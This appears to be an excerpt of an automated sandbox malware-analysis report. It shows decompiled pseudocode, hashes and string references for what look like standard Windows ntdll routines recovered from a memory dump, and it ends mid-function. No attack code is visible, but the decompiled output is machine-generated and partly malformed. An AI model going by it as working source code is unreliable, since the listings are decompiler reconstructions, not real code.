                                                                                                        0x00b906a9
                                                                                                        0x00b906b8
                                                                                                        0x00b906d6
                                                                                                        0x00b906d6
                                                                                                        0x00000000

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: `
                                                                                                        • API String ID: 0-2679148245
                                                                                                        • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                        • Instruction ID: d802ae1b88279caf645e0390133286fa40a754e26d039085e1112c969bf038cd
                                                                                                        • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                        • Instruction Fuzzy Hash: 8331FF32204305AFEB20EE24CD85F9A7BD9EBC4754F044279B9489B281D770ED14CBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B43884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 72%
                                                                                                        			E00B43884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E00B09650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L00AE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L00AE4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E00B09650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                                                        0x00b43893
                                                                                                        0x00b43896
                                                                                                        0x00b43899
                                                                                                        0x00b4389f
                                                                                                        0x00b438a0
                                                                                                        0x00b438a4
                                                                                                        0x00b438a9
                                                                                                        0x00b438ac
                                                                                                        0x00b438ad
                                                                                                        0x00b438ae
                                                                                                        0x00b438af
                                                                                                        0x00b438b1
                                                                                                        0x00b438b4
                                                                                                        0x00b438bb
                                                                                                        0x00b438bc
                                                                                                        0x00b438bd
                                                                                                        0x00b438c4
                                                                                                        0x00b438c8
                                                                                                        0x00b438ca
                                                                                                        0x00b438ca
                                                                                                        0x00b438d5
                                                                                                        0x00b4393e
                                                                                                        0x00b43940
                                                                                                        0x00b43942
                                                                                                        0x00b43952
                                                                                                        0x00b43954
                                                                                                        0x00b43961
                                                                                                        0x00b43961
                                                                                                        0x00b43967
                                                                                                        0x00b4396e
                                                                                                        0x00b4396e
                                                                                                        0x00b43947
                                                                                                        0x00b4394c
                                                                                                        0x00000000
                                                                                                        0x00b4394c
                                                                                                        0x00b438ea
                                                                                                        0x00b438ee
                                                                                                        0x00b438f8
                                                                                                        0x00b438f9
                                                                                                        0x00b438ff
                                                                                                        0x00b43900
                                                                                                        0x00b43902
                                                                                                        0x00b43903
                                                                                                        0x00b4390b
                                                                                                        0x00b4390f
                                                                                                        0x00b43950
                                                                                                        0x00000000
                                                                                                        0x00b43950
                                                                                                        0x00b43915
                                                                                                        0x00b4391d
                                                                                                        0x00b4391d
                                                                                                        0x00b43922
                                                                                                        0x00b43926
                                                                                                        0x00000000
                                                                                                        0x00b43928
                                                                                                        0x00b4392b
                                                                                                        0x00b4392b
                                                                                                        0x00b43935
                                                                                                        0x00b43937
                                                                                                        0x00b43937
                                                                                                        0x00000000
                                                                                                        0x00b43935
                                                                                                        0x00b43926
                                                                                                        0x00b438f0
                                                                                                        0x00000000

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: BinaryName
                                                                                                        • API String ID: 0-215506332
                                                                                                        • Opcode ID: 9252da334e291e058b54edaa9b2f6ad7ea385dbe1b4e37b893d191dfd9ccedbe
                                                                                                        • Instruction ID: 11e3d1af9eecaabbdb7e72c250d89bee542f92f98c4b74239d68d8e2e2112568
                                                                                                        • Opcode Fuzzy Hash: 9252da334e291e058b54edaa9b2f6ad7ea385dbe1b4e37b893d191dfd9ccedbe
                                                                                                        • Instruction Fuzzy Hash: EE31F13290051ABFEB15DA58C945E6BF7F4EB80B20F1981A9A806A7281D7709F00E7A0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00AFD294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 33%
                                                                                                        			E00AFD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0xbbd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E00AE4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E00B0B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E00B098D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E00B095D0();
					L00AE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L00AE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                                                        0x00afd29c
                                                                                                        0x00afd2a6
                                                                                                        0x00afd2b1
                                                                                                        0x00afd2b5
                                                                                                        0x00afd2b6
                                                                                                        0x00afd2bc
                                                                                                        0x00afd2bd
                                                                                                        0x00afd2be
                                                                                                        0x00afd2bf
                                                                                                        0x00afd2c2
                                                                                                        0x00afd2c4
                                                                                                        0x00afd2cc
                                                                                                        0x00afd384
                                                                                                        0x00afd34b
                                                                                                        0x00afd34f
                                                                                                        0x00afd350
                                                                                                        0x00afd351
                                                                                                        0x00afd35c
                                                                                                        0x00afd35c
                                                                                                        0x00afd2d6
                                                                                                        0x00afd2da
                                                                                                        0x00afd2e1
                                                                                                        0x00afd361
                                                                                                        0x00afd369
                                                                                                        0x00afd36d
                                                                                                        0x00afd2e3
                                                                                                        0x00afd2e3
                                                                                                        0x00afd2e3
                                                                                                        0x00afd2e5
                                                                                                        0x00afd2ed
                                                                                                        0x00afd2f5
                                                                                                        0x00afd2fa
                                                                                                        0x00afd302
                                                                                                        0x00afd303
                                                                                                        0x00afd30b
                                                                                                        0x00afd30f
                                                                                                        0x00afd313
                                                                                                        0x00afd318
                                                                                                        0x00afd31c
                                                                                                        0x00afd320
                                                                                                        0x00afd379
                                                                                                        0x00afd37d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b3affe
                                                                                                        0x00b3b001
                                                                                                        0x00b3b011
                                                                                                        0x00000000
                                                                                                        0x00afd322
                                                                                                        0x00afd322
                                                                                                        0x00afd330
                                                                                                        0x00afd337
                                                                                                        0x00afd35d
                                                                                                        0x00afd339
                                                                                                        0x00afd33f
                                                                                                        0x00afd38c
                                                                                                        0x00afd38c
                                                                                                        0x00afd33f
                                                                                                        0x00afd349
                                                                                                        0x00000000
                                                                                                        0x00afd349

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @
                                                                                                        • API String ID: 0-2766056989
                                                                                                        • Opcode ID: 17aa90f35e282da6250c27c3272c3d0dc51cf258fa77ef14a567ec065f8ea4d9
                                                                                                        • Instruction ID: cf81cee9b84f891551c22c29d3cc82418414fe3bb4d153b2c1b4839dc979557a
                                                                                                        • Opcode Fuzzy Hash: 17aa90f35e282da6250c27c3272c3d0dc51cf258fa77ef14a567ec065f8ea4d9
                                                                                                        • Instruction Fuzzy Hash: E931D1B25083099FC322DF68C98196BBBE9EB85754F100A2EFA9497251D734DD04CB93
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00AD1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 72%
                                                                                                        			E00AD1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E00B0BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E00B0A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E00B0A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L00AE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L00AE4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                                                                        0x00ad1b8f
                                                                                                        0x00ad1b9a
                                                                                                        0x00ad1b9c
                                                                                                        0x00ad1b9e
                                                                                                        0x00ad1ba3
                                                                                                        0x00b27010
                                                                                                        0x00b27010
                                                                                                        0x00000000
                                                                                                        0x00ad1ba9
                                                                                                        0x00ad1ba9
                                                                                                        0x00ad1bae
                                                                                                        0x00000000
                                                                                                        0x00ad1bc5
                                                                                                        0x00ad1bca
                                                                                                        0x00ad1bcf
                                                                                                        0x00ad1bd0
                                                                                                        0x00ad1bd1
                                                                                                        0x00ad1bd2
                                                                                                        0x00ad1bd6
                                                                                                        0x00ad1bdc
                                                                                                        0x00ad1be0
                                                                                                        0x00b26ffc
                                                                                                        0x00b27000
                                                                                                        0x00000000
                                                                                                        0x00b27006
                                                                                                        0x00b27009
                                                                                                        0x00b27009
                                                                                                        0x00ad1be6
                                                                                                        0x00ad1bec
                                                                                                        0x00ad1c0b
                                                                                                        0x00ad1c0b
                                                                                                        0x00ad1c0c
                                                                                                        0x00ad1c11
                                                                                                        0x00ad1c12
                                                                                                        0x00ad1c15
                                                                                                        0x00ad1c1b
                                                                                                        0x00ad1c1f
                                                                                                        0x00ad1c31
                                                                                                        0x00ad1c33
                                                                                                        0x00b27026
                                                                                                        0x00b27026
                                                                                                        0x00ad1c21
                                                                                                        0x00ad1c24
                                                                                                        0x00ad1c24
                                                                                                        0x00ad1bee
                                                                                                        0x00ad1bee
                                                                                                        0x00ad1bf2
                                                                                                        0x00ad1c3a
                                                                                                        0x00ad1bf4
                                                                                                        0x00ad1bf4
                                                                                                        0x00ad1c05
                                                                                                        0x00ad1c05
                                                                                                        0x00ad1c09
                                                                                                        0x00ad1c3e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00ad1c09
                                                                                                        0x00ad1bec
                                                                                                        0x00ad1be0
                                                                                                        0x00ad1bae
                                                                                                        0x00ad1c2e

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: WindowsExcludedProcs
                                                                                                        • API String ID: 0-3583428290
                                                                                                        • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                        • Instruction ID: 14601a151554559e703da6e6bc078aeca54e774bc685125447535404a8a5fc0e
                                                                                                        • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                        • Instruction Fuzzy Hash: 6821D476691228BBCB219B59D940F6BB7BDEF41B50F154466FD0ADB300DA34DD00D7A0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00AEF716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00AEF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                                                                        0x00aef71d
                                                                                                        0x00aef722
                                                                                                        0x00aef726
                                                                                                        0x00b34770
                                                                                                        0x00aef765
                                                                                                        0x00aef769
                                                                                                        0x00aef769
                                                                                                        0x00aef732
                                                                                                        0x00b3477a
                                                                                                        0x00000000
                                                                                                        0x00b3477a
                                                                                                        0x00aef738
                                                                                                        0x00aef73a
                                                                                                        0x00aef73c
                                                                                                        0x00aef73f
                                                                                                        0x00aef746
                                                                                                        0x00aef778
                                                                                                        0x00aef7a9
                                                                                                        0x00aef7a9
                                                                                                        0x00aef754
                                                                                                        0x00aef75a
                                                                                                        0x00aef75d
                                                                                                        0x00aef75f
                                                                                                        0x00aef761
                                                                                                        0x00aef76f
                                                                                                        0x00aef771
                                                                                                        0x00aef771
                                                                                                        0x00aef76f
                                                                                                        0x00aef763
                                                                                                        0x00000000
                                                                                                        0x00aef763
                                                                                                        0x00aef77d
                                                                                                        0x00aef7a3
                                                                                                        0x00aef7a5
                                                                                                        0x00000000
                                                                                                        0x00aef7a5
                                                                                                        0x00aef77f
                                                                                                        0x00aef782
                                                                                                        0x00aef784
                                                                                                        0x00aef786
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00aef788
                                                                                                        0x00aef748
                                                                                                        0x00aef74d
                                                                                                        0x00aef78d
                                                                                                        0x00aef793
                                                                                                        0x00aef7b7
                                                                                                        0x00aef7bc
                                                                                                        0x00000000
                                                                                                        0x00aef7bc
                                                                                                        0x00aef798
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00aef79d
                                                                                                        0x00aef7b0
                                                                                                        0x00000000
                                                                                                        0x00aef7b0
                                                                                                        0x00aef79f
                                                                                                        0x00000000
                                                                                                        0x00aef74f
                                                                                                        0x00aef74f
                                                                                                        0x00000000
                                                                                                        0x00aef74f

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Actx
                                                                                                        • API String ID: 0-89312691
                                                                                                        • Opcode ID: 71acfec0c2bc601e168b8639940934146ed8de59d7ede3ddc12005250daddfb0
                                                                                                        • Instruction ID: 2a228d653f25d64e4985826b28115b8e79995fffebe5eb31aec99ff82beb8dd5
                                                                                                        • Opcode Fuzzy Hash: 71acfec0c2bc601e168b8639940934146ed8de59d7ede3ddc12005250daddfb0
                                                                                                        • Instruction Fuzzy Hash: 4E11B2397046C28FEB244F1F889073672E6EB96724F35453AE865CB391EB70DC408380
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B78DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 71%
                                                                                                        			E00B78DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0xba0d50);
				E00B1D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E00B55720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L00B1DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L00B1DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E00B1D130(_t34, _t39, _t40);
			}





                                                                                                        0x00b78df1
                                                                                                        0x00b78df1
                                                                                                        0x00b78df1
                                                                                                        0x00b78df1
                                                                                                        0x00b78df1
                                                                                                        0x00b78df1
                                                                                                        0x00b78df3
                                                                                                        0x00b78df8
                                                                                                        0x00b78dfd
                                                                                                        0x00b78e00
                                                                                                        0x00b78e0e
                                                                                                        0x00b78e2a
                                                                                                        0x00b78e36
                                                                                                        0x00b78e38
                                                                                                        0x00b78e3c
                                                                                                        0x00b78e46
                                                                                                        0x00b78e46
                                                                                                        0x00b78e36
                                                                                                        0x00b78e50
                                                                                                        0x00b78e56
                                                                                                        0x00b78e59
                                                                                                        0x00b78e5c
                                                                                                        0x00b78e60
                                                                                                        0x00b78e67
                                                                                                        0x00b78e6d
                                                                                                        0x00b78e73
                                                                                                        0x00b78e74
                                                                                                        0x00b78eb1
                                                                                                        0x00b78ebd

                                                                                                        Strings
                                                                                                        • Critical error detected %lx, xrefs: 00B78E21
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Critical error detected %lx
                                                                                                        • API String ID: 0-802127002
                                                                                                        • Opcode ID: 044c17c1f901d04bc116a353d43cd08e2621d514542987da38339b4c34b89fc4
                                                                                                        • Instruction ID: aefeb658d7be2e6a3cb252255434a449720f0e828a57b5c751d47ee170d3f861
                                                                                                        • Opcode Fuzzy Hash: 044c17c1f901d04bc116a353d43cd08e2621d514542987da38339b4c34b89fc4
                                                                                                        • Instruction Fuzzy Hash: B8113972D54348EADF24DFA4850A7DCBBF0BB04315F2482ADE46D6B292C7740A01CF14
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B5FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 00B5FF60
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                        • API String ID: 0-1911121157
                                                                                                        • Opcode ID: e405278ca3f4405bd30de941335e3252259796ac01f5472ab335aa4e6b3c5fbc
                                                                                                        • Instruction ID: f69392efa0d2b50293233500e2b27b5245281d9d11415422247a0543fd6c2c1d
                                                                                                        • Opcode Fuzzy Hash: e405278ca3f4405bd30de941335e3252259796ac01f5472ab335aa4e6b3c5fbc
                                                                                                        • Instruction Fuzzy Hash: 4E11E171951244EFCB22EB50C949FE8BBF1FB08705F1480E4F505676A2C7789A84CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B95BA5, Relevance: .6, Instructions: 592COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 88%
                                                                                                        			E00B95BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0xba1178);
				E00B1D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E00B94C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E00B0D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E00B95542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0xbb60e8;
								if( *0xbb60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0xbb60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
